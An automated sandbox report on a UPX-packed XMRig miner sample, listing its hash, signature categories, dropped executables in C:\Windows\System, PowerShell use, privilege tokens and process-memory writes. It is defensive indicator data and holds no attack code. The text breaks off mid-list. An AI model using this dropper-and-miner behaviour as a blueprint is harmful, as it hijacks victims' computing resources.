Malware Analysis Report

2024-09-10 06:06

Sample ID 240613-pcx7fssclr
Target 7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe
SHA256 f6cd07dc7e3e30dfdbfb547b2ff4121a6c9027daaf9b4edb1578dfb00d134b38
Tags
xmrig execution miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f6cd07dc7e3e30dfdbfb547b2ff4121a6c9027daaf9b4edb1578dfb00d134b38

Threat Level: Known bad

The file 7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 12:11

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 12:11

Reported

2024-06-13 12:14

Platform

win7-20240221-en

Max time kernel

150s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\XiSXgWX.exe N/A
N/A N/A C:\Windows\System\sgZrsWT.exe N/A
N/A N/A C:\Windows\System\IzGIifB.exe N/A
N/A N/A C:\Windows\System\AJHBYeR.exe N/A
N/A N/A C:\Windows\System\tBWhVgW.exe N/A
N/A N/A C:\Windows\System\bBuzmaY.exe N/A
N/A N/A C:\Windows\System\bczcFtN.exe N/A
N/A N/A C:\Windows\System\oPqtWIx.exe N/A
N/A N/A C:\Windows\System\NbUAmUl.exe N/A
N/A N/A C:\Windows\System\FKbhKNw.exe N/A
N/A N/A C:\Windows\System\QAESDrk.exe N/A
N/A N/A C:\Windows\System\HyXCoMx.exe N/A
N/A N/A C:\Windows\System\EudHpZR.exe N/A
N/A N/A C:\Windows\System\TSjYYsR.exe N/A
N/A N/A C:\Windows\System\ljOhnSW.exe N/A
N/A N/A C:\Windows\System\NRPfLOi.exe N/A
N/A N/A C:\Windows\System\hnWqhUq.exe N/A
N/A N/A C:\Windows\System\HDEHqqV.exe N/A
N/A N/A C:\Windows\System\eQWVpHH.exe N/A
N/A N/A C:\Windows\System\LSOQmCy.exe N/A
N/A N/A C:\Windows\System\CwfhlQm.exe N/A
N/A N/A C:\Windows\System\ezlYgRK.exe N/A
N/A N/A C:\Windows\System\zrmsoGV.exe N/A
N/A N/A C:\Windows\System\rTkPagf.exe N/A
N/A N/A C:\Windows\System\AVceWtm.exe N/A
N/A N/A C:\Windows\System\CzutKvq.exe N/A
N/A N/A C:\Windows\System\rhjfoqW.exe N/A
N/A N/A C:\Windows\System\euBITjP.exe N/A
N/A N/A C:\Windows\System\PdOWNLu.exe N/A
N/A N/A C:\Windows\System\UbLpRbF.exe N/A
N/A N/A C:\Windows\System\ADSUSTw.exe N/A
N/A N/A C:\Windows\System\ZWmqeXS.exe N/A
N/A N/A C:\Windows\System\ICqBucV.exe N/A
N/A N/A C:\Windows\System\UKsBdmD.exe N/A
N/A N/A C:\Windows\System\dtezqnp.exe N/A
N/A N/A C:\Windows\System\ljPjhmS.exe N/A
N/A N/A C:\Windows\System\kgeltko.exe N/A
N/A N/A C:\Windows\System\dMXfEPy.exe N/A
N/A N/A C:\Windows\System\vVBzptI.exe N/A
N/A N/A C:\Windows\System\QbABEUj.exe N/A
N/A N/A C:\Windows\System\ZfTNGKm.exe N/A
N/A N/A C:\Windows\System\joXDfOG.exe N/A
N/A N/A C:\Windows\System\BKQSmAb.exe N/A
N/A N/A C:\Windows\System\FSyXbUY.exe N/A
N/A N/A C:\Windows\System\WtAiTQy.exe N/A
N/A N/A C:\Windows\System\jLBhIUr.exe N/A
N/A N/A C:\Windows\System\uOftAVE.exe N/A
N/A N/A C:\Windows\System\qULjLeG.exe N/A
N/A N/A C:\Windows\System\gNPrxAQ.exe N/A
N/A N/A C:\Windows\System\dNYPRAn.exe N/A
N/A N/A C:\Windows\System\cgfvftQ.exe N/A
N/A N/A C:\Windows\System\kxYvKct.exe N/A
N/A N/A C:\Windows\System\PTYHDrG.exe N/A
N/A N/A C:\Windows\System\DpHcdse.exe N/A
N/A N/A C:\Windows\System\YkCuwWO.exe N/A
N/A N/A C:\Windows\System\ekCFyxy.exe N/A
N/A N/A C:\Windows\System\pxxSNnV.exe N/A
N/A N/A C:\Windows\System\BlJHxwv.exe N/A
N/A N/A C:\Windows\System\UZGEYbm.exe N/A
N/A N/A C:\Windows\System\cATumuE.exe N/A
N/A N/A C:\Windows\System\hNnBPSK.exe N/A
N/A N/A C:\Windows\System\wcOuPeW.exe N/A
N/A N/A C:\Windows\System\ppdmKFk.exe N/A
N/A N/A C:\Windows\System\zPvdkKD.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\iQIlyWk.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gzPXnAp.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KPWFYAW.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HDttPda.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DyBtEiS.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GKYofMK.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HDHZrdH.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KArOFWA.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uMZPAVh.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TJpUqpD.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vsksZFB.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bgjnbrA.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KmBZnrH.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VVFfiqI.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uhlHkaG.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gWTusBQ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\taYMSnU.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OfuUVdj.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XEGwHnq.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QYtettZ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NKHzNDf.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aZzmbke.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BXxTGmr.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tIihhKG.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BMUeRVX.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iTAfgtb.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UcGEwTU.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DTMTHzT.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qIwDRxu.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NTEGndH.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ksQiInJ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\daxKtJh.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gAsjLea.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JcaYUrP.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qbJmgbO.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZxFbfWv.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lLXlOtR.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wdjADPI.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lUSyKAH.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FOboNbU.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TbXxmBs.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ueeYQcT.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GVRmkdv.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YMgLvHV.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oXPufRJ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uhAyoVT.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NOGcSFu.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qCATfBJ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CdAdsIH.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MuZygKN.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UBXPZRI.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XCUHthJ.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bjyDxfr.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jVKoYUM.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ODwXQQn.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QYpGYaX.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tJfgOOs.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ySnRIVz.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dQNnkKi.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kUDRmBD.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IRRNjRB.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KmVQCPG.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Ljuwmlb.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TSvhMNH.exe C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\XiSXgWX.exe
PID 2020 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\XiSXgWX.exe
PID 2020 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\XiSXgWX.exe
PID 2020 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7b073f9b6ccef71ce888704f5245bbc0_NeikiAnalytics.exe C:\Windows\System\IzGIifB.exe
